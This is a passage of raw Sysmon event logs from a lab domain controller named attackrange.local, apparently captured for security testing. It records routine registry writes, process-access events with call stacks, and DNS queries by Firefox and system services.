Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x800000000000000018715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000018714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000018713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000018712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x800000000000000018711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x800000000000000018710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x800000000000000018709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x800000000000000018708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x800000000000000018707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x800000000000000018706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x800000000000000018705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 
13241300x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.896{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x800000000000000018703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:00.889{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000018702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.887{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000018701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001b9dd3) 13241300x800000000000000018699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9a-0x634cca25) 13241300x800000000000000018698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0xc5113225) 13241300x800000000000000018697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0x26d59a25) 13241300x800000000000000018696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000018695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001b9dd3) 13241300x800000000000000018694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed9a-0x6329a7e5) 13241300x800000000000000018693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0xc4ee0fe5) 13241300x800000000000000018692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:00.212{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edab-0x26b277e5) 22542200x800000000000000018716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.862{59A5CD1D-8E56-6005-2E00-00000000A301}24641.1.0.10.in-addr.arpa.0type: 12 ip-10-0-1-1.eu-central-1.compute.internal;C:\Windows\sysmon64.exe 22542200x800000000000000018721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.479{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net054.230.183.34;54.230.183.110;54.230.183.119;54.230.183.6;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.479{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:54.230.183.6;::ffff:54.230.183.34;::ffff:54.230.183.110;::ffff:54.230.183.119;C:\Program 
Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.304{59A5CD1D-945A-6005-3305-00000000A301}7052classify-client.services.mozilla.com0type: 5 prod-classifyclient.normandy.prod.cloudops.mozgcp.net;34.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.271{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com052.222.177.21;52.222.177.92;52.222.177.101;52.222.177.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.270{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:52.222.177.108;::ffff:52.222.177.21;::ffff:52.222.177.92;::ffff:52.222.177.101;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:04.036{59A5CD1D-8E56-6005-2E00-00000000A301}2464108.177.222.52.in-addr.arpa.0type: 12 server-52-222-177-108.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:02.481{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:f400:a:da5e:7900:93a1;2600:9000:2057:1c00:a:da5e:7900:93a1;2600:9000:2057:2a00:a:da5e:7900:93a1;2600:9000:2057:2c00:a:da5e:7900:93a1;2600:9000:2057:5600:a:da5e:7900:93a1;2600:9000:2057:8200:a:da5e:7900:93a1;2600:9000:2057:8600:a:da5e:7900:93a1;2600:9000:2057:9400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:15.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:15.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:18.055{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:22.727{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:30.367{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000018733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000018732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:04:31.414{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 13241300x800000000000000018735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:04:35.648{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda2-0xda45a624) 10341000x800000000000000018736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:39.242{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:41.993{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:44.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:44.539{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-957C-6005-5D05-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
